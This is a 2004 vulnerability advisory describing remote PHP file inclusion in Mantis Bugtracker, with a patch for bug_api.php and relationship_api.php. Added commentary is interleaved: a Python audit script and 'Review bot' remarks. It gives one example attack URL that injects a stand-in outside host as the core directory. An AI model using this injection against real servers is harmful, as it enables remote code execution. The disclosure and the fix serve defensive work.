
Mantis Bugtracker Remote PHP Code Execution Vulnerability

--------------------------------------------------------------------------- 
           Mantis Bugtracker Remote PHP Code Execution Vulnerability 
--------------------------------------------------------------------------- 
 
Author: Joxean Koret 
Date: 08-01-2004 
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
Mantis Bugtracker 
 
Mantis is a web-based bugtracking system. It is written in the PHP scripting 
language and requires the MySQL database and a webserver. 
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Remote PHP Code Execution Vulnerability 
 
A1. If PHP's register_globals directive is enabled, an attacker can execute 
arbitrary PHP code by overwriting the global variable $t_core_dir with a URL 
of their choice (for example 
http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/). 
  
 The following files are vulnerable: 
   
 bug_api.php -> at line 22? (using variable $t_core_path) 
 relationship_api.php -> line 14 (using variable $t_core_dir) 
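As an added example (not from the advisory and not Mantis code), a small audit script for the pattern described above: it flags include/require statements whose path variable is not assigned earlier in the same file, which is exactly what made $t_core_path in bug_api.php and $t_core_dir in relationship_api.php controllable through register_globals. The PHP snippets it scans are constructed to mirror the patch hunks, not copied from Mantis.

```python
import re

# include/require whose path begins with a variable, e.g.
#   require_once( $t_core_path.'relationship_api.php' );
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)\s*\.", re.IGNORECASE)
# a plain assignment to a variable, e.g.  $t_core_dir = dirname( __FILE__ )...
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)")

def find_unguarded_includes(php_source):
    """Return [(line_no, var)] for every include/require whose path variable is
    used before any assignment to it in the same file (with register_globals on,
    such a variable is whatever the request supplied).  Line-oriented heuristic."""
    assigned = set()
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        code = line.split("#", 1)[0]          # drop '#' comments as used in Mantis core
        for m in INCLUDE_RE.finditer(code):
            if m.group(1) not in assigned:    # used before any assignment seen so far
                findings.append((line_no, m.group(1)))
        for m in ASSIGN_RE.finditer(code):
            assigned.add(m.group(1))
    return findings

# Constructed samples mirroring the advisory's patch hunks (not Mantis source).
BUG_API_BEFORE = """<?php
    $t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;
    require_once( $t_core_dir . 'sponsorship_api.php' );
    # MASC RELATIONSHIP
    require_once( $t_core_path.'relationship_api.php' );
"""
BUG_API_AFTER = BUG_API_BEFORE.replace("$t_core_path", "$t_core_dir")

RELATIONSHIP_BEFORE = """<?php
    ### Relationship API ###
    require_once( $t_core_dir . 'collapse_api.php' );
"""
RELATIONSHIP_AFTER = RELATIONSHIP_BEFORE.replace(
    "    require_once",
    "    $t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;\n    require_once")

if __name__ == "__main__":
    for line_no, var in find_unguarded_includes(BUG_API_BEFORE):
        print(f"bug_api.php:{line_no}: ${var} used in include before assignment")
```

Run it over a whole core/ directory to find any other file with the same defect; a variable defined only by an including script will also be reported, so check those by hand.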
 
The fix: 
~~~~~~~~ 
 
Both of these issues have now been fixed in CVS. 
 
There is also a patch for the Mantis 0.19.0a version: 
 
===================================================================== 
mantis.patch 
 
bug_api.php 
 @@ -19,7 +19,7 @@ 
      require_once( $t_core_dir . 
'sponsorship_api.php' ); 
   
      # MASC RELATIONSHIP 
 - 
require_once( $t_core_path.'relationship_api.php' ); 
 + 
require_once( $t_core_dir.'relationship_api.php' ); 
      # MASC RELATIONSHIP 
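Review bot: the fix replaces $t_core_path, which nothing in bug_api.php assigns, with $t_core_dir, which the context line above already uses for sponsorship_api.php, so the include path can no longer come from the request when register_globals is on. Worth confirming that $t_core_dir itself is initialised from dirname( __FILE__ ) near the top of bug_api.php rather than inherited from the including script, and that no other file under core/ still references $t_core_path (a grep for it should come back empty after this patch), since any remaining use in an include would be reachable the same way.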
  
 and to relationship API: 
      ### Relationship API ### 
   
 + $t_core_dir = 
dirname( __FILE__ ).DIRECTORY_SEPARATOR; 
 + 
      require_once( $t_core_dir . 
'collapse_api.php' ); 
   
      # MASC RELATIONSHIP  
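Review bot: this hunk has no @@ line-range header, so patch cannot apply it as written; regenerating it with diff -u against relationship_api.php would make the advisory's patch usable as a whole. The change itself is the right shape: assigning $t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR unconditionally before the first require_once means a value injected through register_globals is overwritten before it is used. Keep that assignment above every include in the file, since only the collapse_api.php include is visible here.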
 
===================================================================== 
--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 
 
        Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es